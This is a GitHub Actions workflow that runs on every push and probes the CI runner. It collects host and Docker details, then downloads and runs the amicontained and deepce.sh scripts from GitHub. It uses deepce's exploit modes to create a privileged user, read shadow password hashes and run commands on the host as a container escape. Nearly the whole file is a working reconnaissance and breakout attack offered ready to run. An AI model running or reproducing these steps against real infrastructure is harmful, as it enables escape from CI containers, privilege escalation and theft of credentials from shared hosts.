name: GHA Test
on: [push]
jobs: 
  Recon: #Each job can run for 6h max
    runs-on: ubuntu-latest
    steps:
      - run: echo "Recon"
      - run: |
            id
            uname -a  
      - run: |
            ps -ef
            netstat -nl
      - run: |
            docker network; \
            docker info      
      - run: |
            cd /tmp; \
            curl -L -o amicontained https://github.com/genuinetools/amicontained/releases/download/v0.4.7/amicontained-linux-amd64; \
            chmod 555 amicontained; \
            ./amicontained
      - run: |
            cd /tmp; \
            wget https://github.com/stealthcopter/deepce/raw/master/deepce.sh; \
            chmod +x ./deepce.sh; \
            ./deepce.sh; \
            ./deepce.sh --no-enumeration --exploit PRIVILEGED --username deepce --password deepce; \
            ./deepce.sh --no-enumeration --exploit SOCK --shadow; \
            ./deepce.sh --no-enumeration --exploit DOCKER --command "whoami>/tmp/hacked" 
